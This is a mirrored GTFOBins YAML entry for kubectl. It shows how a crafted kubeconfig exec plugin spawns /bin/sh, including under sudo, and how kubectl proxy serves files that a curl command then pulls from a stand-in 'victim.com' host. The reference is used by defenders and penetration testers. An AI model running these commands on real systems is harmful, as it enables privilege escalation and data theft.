mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
47 lines
1.0 KiB
Plaintext
47 lines
1.0 KiB
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
cat >/path/to/temp-file <<EOF
|
|
clusters:
|
|
- cluster:
|
|
server: https://x
|
|
name: x
|
|
contexts:
|
|
- context:
|
|
cluster: x
|
|
user: x
|
|
name: x
|
|
current-context: x
|
|
users:
|
|
- name: x
|
|
user:
|
|
exec:
|
|
apiVersion: client.authentication.k8s.io/v1
|
|
interactiveMode: Always
|
|
command: /bin/sh
|
|
args:
|
|
- '-c'
|
|
- '/bin/sh 0<&2 1>&2'
|
|
EOF
|
|
|
|
kubectl get pods --kubeconfig=/path/to/temp-file
|
|
comment: |-
|
|
The shell is spawn multiple times.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
upload:
|
|
- code: |-
|
|
kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
receiver:
|
|
code: |-
|
|
curl victim.com:12345/x/path/to/input-file -o /path/to/output-file
|
|
comment: |-
|
|
An HTTP client can be used on the attacker box to receive the data.
|
|
...
|